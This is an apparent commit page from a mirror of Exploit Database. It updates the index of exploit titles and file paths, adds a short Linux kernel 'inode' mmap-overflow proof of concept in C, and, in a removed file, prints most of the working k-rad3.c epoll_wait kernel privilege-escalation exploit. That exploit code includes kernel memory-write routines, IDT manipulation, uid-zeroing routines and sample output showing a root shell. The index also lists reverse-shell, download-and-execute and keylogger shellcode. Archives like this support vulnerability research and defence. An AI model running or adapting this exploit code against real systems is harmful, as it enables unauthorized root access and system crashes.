bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-11-24

Browse source 
6 new exploits

Linux Kernel 2.6.32-642 / 3.16.0-4 - 'inode' Integer Overflow
UCanCode - Multiple Vulnerabilities
Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)
Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)

Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service (PoC)
Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (1)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (2)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)

Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation (3)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) (1)
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation (2)
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC)
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation

Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Privilege Escalation
Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation

Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Privilege Escalation
Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Privilege Escalation

Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Privilege Escalation (2)
Linux Kernel 2.6.18 - 'move_pages()' Information Leak
Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak
Linux Kenrel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation

Windows x64 - Download & Execute Shellcode (358 bytes)
This commit is contained in:
Offensive Security 2016-11-24 05:01:19 +00:00
parent 32fc589910
commit 38038a7128
12 changed files with 1653 additions and 753 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

27
files.csv
View file

@ -3323,6 +3323,8 @@ id,file,description,date,author,platform,type,port
25164,platforms/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",linux,dos,0
25165,platforms/multiple/dos/25165.c,"Stormy Studios KNet 1.x - Remote Buffer Overflow",2005-02-26,Expanders,multiple,dos,0
25171,platforms/multiple/dos/25171.txt,"MercurySteam Scrapland Game Server 1.0 - Remote Denial of Service",2005-02-28,"Luigi Auriemma",multiple,dos,0
40819,platforms/linux/dos/40819.c,"Linux Kernel 2.6.32-642 / 3.16.0-4 - 'inode' Integer Overflow",2016-11-23,"Todor Donev",linux,dos,0
40820,platforms/windows/dos/40820.txt,"UCanCode - Multiple Vulnerabilities",2016-11-23,shinnai,windows,dos,0
25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service",2005-03-05,ports,windows,dos,0
25219,platforms/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service",2005-03-15,dr_insane,windows,dos,0
25231,platforms/windows/dos/25231.txt,"Microsoft Windows 2000/2003/XP - Graphical Device Interface Library Denial of Service",2005-03-17,"Hongzhen Zhou",windows,dos,0
@ -4015,8 +4017,8 @@ id,file,description,date,author,platform,type,port
31957,platforms/multiple/dos/31957.txt,"World in Conflict 1.008 - Null Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",multiple,dos,0
31958,platforms/multiple/dos/31958.txt,"SunAge 1.8.1 - Multiple Denial of Service Vulnerabilities",2008-06-23,"Luigi Auriemma",multiple,dos,0
31964,platforms/windows/dos/31964.txt,"5th street - 'dx8render.dll' Format String",2008-06-25,superkhung,windows,dos,0
31965,platforms/linux/dos/31965.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0
31966,platforms/linux/dos/31966.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0
31965,platforms/linux/dos/31965.c,"Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0
31966,platforms/linux/dos/31966.c,"Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0
31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
32095,platforms/linux/dos/32095.pl,"Asterisk 1.6 IAX - 'POKE' Requests Remote Denial of Service",2008-07-21,"Blake Cornell",linux,dos,0
31979,platforms/linux/dos/31979.html,"GNOME Evolution 2.22.2 - 'html_engine_get_view_width()' Denial of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
@ -5254,7 +5256,7 @@ id,file,description,date,author,platform,type,port
40696,platforms/linux/dos/40696.c,"Memcached 1.4.33 - PoC (2)",2016-11-01,"p0wd3r / dawu",linux,dos,0
40697,platforms/linux/dos/40697.c,"Memcached 1.4.33 - PoC (3)",2016-11-01,"p0wd3r / dawu",linux,dos,0
40699,platforms/windows/dos/40699.txt,"Axessh 4.2 - Denial of Service",2016-11-03,hyp3rlinx,windows,dos,0
40703,platforms/windows/dos/40703.pl,"Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service (PoC)",2016-11-08,"Todor Donev",windows,dos,0
40703,platforms/windows/dos/40703.pl,"Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service",2016-11-08,"Todor Donev",windows,dos,0
40722,platforms/windows/dos/40722.html,"Microsoft Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0
40731,platforms/linux/dos/40731.c,"Linux Kernel - TCP Related Read Use-After-Free",2016-08-18,"Marco Grassi",linux,dos,0
40744,platforms/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",windows,dos,0
@ -5304,13 +5306,13 @@ id,file,description,date,author,platform,type,port
131,platforms/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation",2003-12-05,"Wojciech Purczynski",linux,local,0
134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - /usr/bin/ct Local Format String Privilege Escalation",2003-12-16,watercloud,hp-ux,local,0
140,platforms/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0
141,platforms/linux/local/141.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (1)",2004-01-06,"Christophe Devine",linux,local,0
142,platforms/linux/local/142.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (2)",2004-01-07,"Christophe Devine",linux,local,0
141,platforms/linux/local/141.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)",2004-01-06,"Christophe Devine",linux,local,0
142,platforms/linux/local/142.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)",2004-01-07,"Christophe Devine",linux,local,0
144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0
145,platforms/linux/local/145.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation (3)",2004-01-15,"Paul Starzetz",linux,local,0
145,platforms/linux/local/145.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation",2004-01-15,"Paul Starzetz",linux,local,0
152,platforms/linux/local/152.c,"rsync 2.5.7 - Local Stack Overflow Privilege Escalation",2004-02-13,"Abhisek Datta",linux,local,0
154,platforms/linux/local/154.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) (1)",2004-02-18,"Christophe Devine",linux,local,0
160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation (2)",2004-03-01,"Paul Starzetz",linux,local,0
154,platforms/linux/local/154.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC)",2004-02-18,"Christophe Devine",linux,local,0
160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation",2004-03-01,"Paul Starzetz",linux,local,0
172,platforms/windows/local/172.c,"FirstClass Desktop 7.1 - Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0
178,platforms/linux/local/178.c,"LBL Traceroute - Privilege Escalation",2000-11-15,"Michel Kaempf",linux,local,0
180,platforms/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,linux,local,0
@ -5548,7 +5550,7 @@ id,file,description,date,author,platform,type,port
1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local,0
1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - (phgrafx) Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0
1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - (Env Variable) Local Exploit",2005-12-07,c0ntex,solaris,local,0
1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Privilege Escalation",2005-12-30,alert7,linux,local,0
1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation",2005-12-30,alert7,linux,local,0
1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - (termsh) Privilege Escalation",2006-01-03,prdelka,sco,local,0
1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0
1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow (2)",2006-01-04,c0d3r,windows,local,0
@ -6068,7 +6070,7 @@ id,file,description,date,author,platform,type,port
9177,platforms/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Universal Buffer Overflow",2009-07-16,Crazy_Hacker,windows,local,0
9186,platforms/windows/local/9186.pl,"Easy RM to MP3 Converter - '.m3u' Universal Stack Overflow",2009-07-17,Stack,windows,local,0
9190,platforms/windows/local/9190.pl,"htmldoc 1.8.27.1 - '.html' Universal Stack Overflow",2009-07-17,ksa04,windows,local,0
9191,platforms/linux/local/9191.txt,"Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Privilege Escalation",2009-07-17,spender,linux,local,0
9191,platforms/linux/local/9191.txt,"Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Privilege Escalation",2009-07-17,spender,linux,local,0
9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - (getPlus_HelperSvc.exe) Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0
9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Privilege Escalation",2009-07-20,anonymous,linux,local,0
9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Privilege Escalation",2009-07-20,anonymous,linux,local,0
@ -7865,7 +7867,6 @@ id,file,description,date,author,platform,type,port
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0
25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow (SEH)",2013-05-02,metacom,windows,local,0
25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation (1)",2005-03-09,sd,linux,local,0
25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Privilege Escalation (2)",2005-03-09,alert7,linux,local,0
25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0
25256,platforms/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0
25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (2)",2005-04-08,qobaiashi,linux,local,0
@ -8653,6 +8654,9 @@ id,file,description,date,author,platform,type,port
40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS root_reboot - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0
40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0
40812,platforms/linux/local/40812.c,"Linux Kenrel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15689,6 +15693,7 @@ id,file,description,date,author,platform,type,port
40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse Shell TCP Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0
40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download & Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0

Can't render this file because it is too large.

41
platforms/linux/dos/40819.c Executable file
View file

@ -0,0 +1,41 @@
/* Linux Kernel 2.6.32-642 / 3.16.0-4 'inode' Integer Overflow PoC
The inode is a data structure in a Unix-style file system which describes a filesystem
object such as a file or a directory. Each inode stores the attributes and disk block
locations of the object's data. Filesystem object attributes may include metadata, as
well as owner and permission data.
INODE can be overflowed by mapping a single file too many times, allowing for a local
user to possibly gain root access.
Disclaimer:
This or previous program is for Educational purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the information or functionality provided
by these programs. The author or any Internet provider bears NO responsibility for content
or misuse of these programs or any derivatives thereof. By using these programs you accept
the fac that any damage (dataloss, system crash, system compromise, etc.) caused by the use
of these programs is not Todor Donev's responsibility.
Thanks to Maya Hristova and all friends.
Suggestions,comments and job offers are welcome!
Copyright 2016 (c) Todor Donev
Varna, Bulgaria
todor.donev@gmail.com
https://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
http://pastebin.com/u/hackerscommunity
*/
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
void main(){
int fd, i;
fd = open("/dev/zero", O_RDONLY);
for(i = 0; i < 26999; i++){
mmap((char*)0x00000000 + (0x10000 * i), 1, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
}
}

3
platforms/linux/local/141.c
View file

@ -1,5 +1,6 @@
/*
* EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
* EDB Note: This will just "test" the vulnerability.
* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
*/
/*

3
platforms/linux/local/142.c
View file

@ -1,5 +1,6 @@
/*
* EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
* EDB Note: This will just "test" the vulnerability.
* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
*/
/*

740
platforms/linux/local/25203.c
View file

@ -1,740 +0,0 @@
/*
source: http://www.securityfocus.com/bid/12763/info
A Local integer overflow vulnerability affects the Linux kernel. This issue is due to a failure of the affected kernel to properly handle user-supplied size values.
An attacker may leverage this issue to overwrite low kernel memory. This may potentially facilitate privilege escalation.
*/
/*
* k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3
* Discovered and original exploit coded Jan 2005 by sd <sd@fucksheep.org>
*
*********************************************************************
*
* Modified 2005/9 by alert7 <alert7@xfocus.org>
* XFOCUS Security Team http://www.xfocus.org
*
* gcc -o k-rad3 k-rad3.c -static -O2
*
* tested succeed :
* on default installed RHEL4(2.6.9-5.EL and 2.6.9-5.ELsmp)
* 2.6.9-5.EL ./k-rad3 -p 2
* 2.6.9-5.ELsmp ./k-rad3 -a -p 7
* on default installed maglic linux 1.2
* MagicLinux 2.6.9 #1 ./k-rad3 -t 1 -p 2
*
* thank watercloud tested maglic linux 1.2
* thank eist provide RHEL4 to test
* thank sd <sd@fucksheep.org> share his stuff.
* thank xfocus & xfocus's firends
*
*
* TODO:
* CASE 1: use stack > 0xc0000000
* CASE 2: CONFIG_X86_PAE define ,but cpu flag no pse
*
*[alert7@MagicLinux ~]$ ./k-rad3 -h
*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ]
*[ Discovered Jan 2005 by sd <sd@fucksheep.org> ]
*[ Modified 2005/9 by alert7 <alert7@xfocus.org> ]
*
*Usage: ./k-rad3
* -s forced cpu flag pse
* -a define CONFIG_X86_PAE,default none
* -e <num> have two kernel code,default 0
* -p <num> alloc pages(4k) ,default 1. Increase from 1 to 7
* The higher number the more likely it will crash
* -t <num> default 0
* 0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192
*
*[alert7@MagicLinux ~]$ ./k-rad3 -t 1 -p 2
*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ]
*[ Discovered Jan 2005 by sd <sd@fucksheep.org> ]
*[ Modified 2005/9 by alert7 <alert7@xfocus.org> ]
*[+] try open /proc/cpuinfo .. ok!!
*[+] find cpu flag pse in /proc/cpuinfo
*[+] CONFIG_X86_PAE :none
*[+] Cpu flag: pse ok
*[+] Exploit Way : 0
*[+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n)
*[+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192
*[+] idtr.base 0xc0461000 ,base 0xc0000000
*[+] kwrite base 0xc0000000, buf 0xbffed750,num 8196
*[+] idt[0x7f] addr 0xffc003f8
*[+] j00 1u(k7 k1d!
*[root@k-rad3 ~] #id
*uid=0(root) gid=0(root) groups=500(alert7)
*
*
* Linux Kernel <= 2.6.11 "sys_epoll_wait" Local integer overflow Exploit
*
* "it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11)
* memory due to integer overflow in sys_epoll_wait and misuse of
* __put_user in ep_send_events"
* Georgi Guninski: http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html
*
*********************************************************************
*
*
* In memory of pwned.c (uselib)
*
* - Redistributions of source code is not permitted.
* - Redistributions in the binary form is not permitted.
* - Redistributions of the above copyright notice, this list of conditions,
* and the following disclaimer is permitted.
* - By proceeding to a Redistribution and under any form of the Program
* the Distributor is granting ownership of his Resources without
* limitations to the copyright holder(s).
*
*
* Since we already owned everyone, theres no point keeping this private
* anymore.
*
* http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html
*
* Thanks to our internet hero georgi guninski for being such incredible
* whitehat disclosing one of the most reliable kernel bugs.
* You saved the world, man, we owe you one!
*
* This version is somewhat broken, but skilled reader will get an idea.
* Well, at least let the scriptkids have fun for a while.
*
* Thanks to all who helped me developing/testing this, you know who you are,
* and especially to my gf for guidance while coding this.
*
*/
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/epoll.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <linux/capability.h>
#include <asm/unistd.h>
#ifndef __USE_GNU
#define __USE_GNU
#endif
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <string.h>
/**
* Relationship Variables
*
* 1: CONFIG_X86_PAE
* see /lib/modules/`uname -r`/build/.config
* 1.1: pse
* 2: THREAD_SIZE
* see include/asm/thread_info.h THREAD_SIZE define
*/
#define MAP (0xfffff000 - (1023*4096))
#define MAP_PAE (0xfffff000 - (511*4096))
#define MKPTE(addr) ((addr & (~4095)) | 0x27)
#define MKPMD(x) (0x1e3|0x004)
////////////////////////////////////////////////
#define KRADPS1 "k-rad3"
#define kB * 1024
#define MB * 1024 kB
#define GB * 1024 MB
#define KRS "\033[1;30m[ \033[1;37m"
#define KRE "\033[1;30m ]\033[0m"
#define KRAD "\033[1;30m[\033[1;37m*\033[1;30m]\033[0m "
#define KRADP "\033[1;30m[\033[1;37m+\033[1;30m]\033[0m "
#define KRADM "\033[1;30m[\033[1;37m-\033[1;30m]\033[0m "
#define SET_IDT_GATE(idt,ring,s,addr) \
(idt).off1 = addr & 0xffff; \
(idt).off2 = addr >> 16; \
(idt).sel = s; \
(idt).none = 0; \
(idt).flags = 0x8E | (ring << 5);
//config val
static int havepse = 0;
static int definePAE = 0;
static int exploitway = 0;
static int npages = 1;
static int thread_size = 0;
static uid_t uid = 0;
static unsigned long long *clear1;
static char * progargv0;
struct idtr {
unsigned short limit;
unsigned int base;
} __attribute__ ((packed));
struct idt {
unsigned short off1;
unsigned short sel;
unsigned char none,flags;
unsigned short off2;
} __attribute__ ((packed));
#define __syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
errno = -(res); \
res = -1; \
} \
return (type) (res); \
} while (0)
#define _capget_macro(type,name,type1,arg1,type2,arg2) \
type name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ( "int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
__syscall_return(type,__res); \
}
static inline _capget_macro(int,capget,void *,a,void *,b);
static int THREAD_SIZE_MASK =(-4096);
static void
fatal(const char *message)
{
system("uname -a");
printf("[-] %s\n",message);
exit(1);
}
void kernel(unsigned * task)
{
unsigned * addr = task;
/* looking for uids */
*clear1 = 0;
while (addr[0] != uid || addr[1] != uid ||
addr[2] != uid || addr[3] != uid
)
addr++;
addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */
addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */
}
void kcode(void);
void __kcode(void)
{
asm(
"kcode: \n"
"cld \n"
" pusha \n"
" pushl %es \n"
" pushl %ds \n"
" movl %ss,%edx \n"
" movl %edx,%es \n"
" movl %edx,%ds \n");
__asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) );
asm(
" andl %esp,%eax \n"
" pushl (%eax) \n"
" call kernel \n"
" addl $4, %esp \n"
" popl %ds \n"
" popl %es \n"
" popa \n"
" cli \n"
" iret \n"
);
}
void raise_cap(unsigned long *ts)
{
/* must be on lower addresses because of kernel arg check :) */
static struct __user_cap_header_struct head;
static struct __user_cap_data_struct data;
static struct __user_cap_data_struct n;
int i;
*clear1 = 0;
head.version = 0x19980330;
head.pid = 0;
capget(&head, &data);
/* scan the thread_struct */
for (i = 0; i < 512; i++, ts++)
{
/* is it capabilities block? */
if ( (ts[0] == data.effective) &&
(ts[1] == data.inheritable) &&
(ts[2] == data.permitted))
{
/* set effective cap to some val */
ts[0] = 0x12341234;
capget(&head, &n);
/* and test if it has changed */
if (n.effective == ts[0])
{
/* if so, we're in :) */
ts[0] = ts[1] = ts[2] = 0xffffffff;
return;
}
/* otherwise fix back the stuff
(if we've not crashed already :) */
ts[0] = data.effective;
}
}
return;
}
void stub(void);
void __stub(void)
{
asm (
"stub:;"
" pusha;"
);
__asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) );
asm(
" and %esp, %eax;"
" pushl (%eax);"
" call raise_cap;"
" pop %eax;"
" popa;"
" iret;"
);
}
/* write to kernel from buf, num bytes */
static int
kwrite(unsigned base, char *buf, int num)
{
#define DIV 256
#define RES 4
int efd, c, i, fd;
int pi[2];
struct epoll_event ev;
int *stab;
unsigned long ptr;
int count;
unsigned magic = 0xffffffff / 12 + 1;
printf("[+] kwrite base %p, buf %p,num %d\n", (void *)base,buf,num);
/* initialize epoll */
efd = epoll_create(4096);
if (efd < 0)
return -1;
ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP;
/* 12 bytes per fd + one more to be safely in stack space */
count = (num+11)/12+RES;
/* desc array */
stab = alloca((count+DIV-1)/DIV*sizeof(int));
for (i = 0; i < ((count+DIV-1)/DIV)+1; i++)
{
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pi) < 0)
return -1;
send(pi[0], "a", 1, 0);
stab[i] = pi[1];
}
/* highest fd and first descriptor */
fd = pi[1];
/* we've to allocate this separately because we need to have
it's fd preserved - using this we'll be writing actual bytes */
epoll_ctl(efd, EPOLL_CTL_ADD, fd, &ev);
//printf("EPOLL_CTL_ADD count %u\n",count);
for (i = 0, c = 0; i < (count-1); i++)
{
int n;
n = dup2(stab[i/DIV], fd+2+(i % DIV));
if (n < 0)
return -1;
epoll_ctl(efd, EPOLL_CTL_ADD, n, &ev);
close(n);
}
/* in 'n' we've the latest fd we're using to write data */
for (i = 0; i < ((num+7)/8); i++)
{
/* data being written from end */
memcpy(&ev.data, buf + num - 8 - i * 8, 8);
epoll_ctl(efd, EPOLL_CTL_MOD, fd, &ev);
/* the actual kernel magic */
ptr = (base + num - (i*8)) - (count * 12);
struct epoll_event *events =(struct epoll_event *)ptr;
//printf("epoll_wait verify_area(%p,%p) addr %p %p\n",ptr,magic* sizeof(struct epoll_event) ,&events[0].events,magic);
int iret =epoll_wait(efd, (void *) ptr, magic, 31337);
if (iret ==-1)
{
perror("epoll_wait");
fatal("This kernel not vulnerability!!!");
}
/* don't ask why (rotten rb-trees) :) */
if (i)
{
//printf("epoll_wait verify_area(%p,%p) %p\n",ptr,magic* sizeof(struct epoll_event) ,magic);
iret = epoll_wait(efd, (void *)ptr, magic, 31337);
if (iret ==-1)
{
perror("epoll_wait");
fatal("This kernel not vulnerability!!!");
}
}
}
close(efd);
for (i = 3; i <= fd; i++)
close(i);
return 0;
}
/* real-mode interrupt table fixup - point all interrupts to iret.
let's hope this will shut up apm */
static void
fixint(char *buf)
{
unsigned *tab = (void *) buf;
int i;
for (i = 0; i < 256; i++)
tab[i] = 0x0000400; /* 0000:0400h */
/* iret */
buf[0x400] =0xcf;
}
/* establish pte pointing to virtual addr 'addr' */
static int
map_pte(unsigned base, int pagenr, unsigned addr)
{
unsigned *buf = alloca(pagenr * 4096 + 8);
buf[(pagenr) * 1024] = MKPTE(addr);
buf[(pagenr) * 1024+1] = 0;
fixint((void *)buf);
return kwrite(base, (void *)buf, pagenr * 4096 + 4);
}
/* make pme user can rw */
static int
map_pme(unsigned base, int pagenr, unsigned addr)
{
unsigned *buf = alloca(pagenr * 4096 + 32);
buf[(pagenr) * 1024] = MKPMD(addr);
buf[(pagenr) * 1024+1] = 0;
buf[(pagenr) * 1024+2] = MKPMD(addr)|0x00200000;
buf[(pagenr) * 1024+3] = 0;
fixint((void *)buf);
return kwrite(base, (void *)buf, pagenr * 4096 + 4*3);
}
static void
error(int d)
{
printf(KRADM "y3r 422 12 n07 3r337 3nuPh!\n" KRAD "Try increase nrpages?\n");
exit(1);
}
char *bashargv[] = { KRADPS1, NULL };
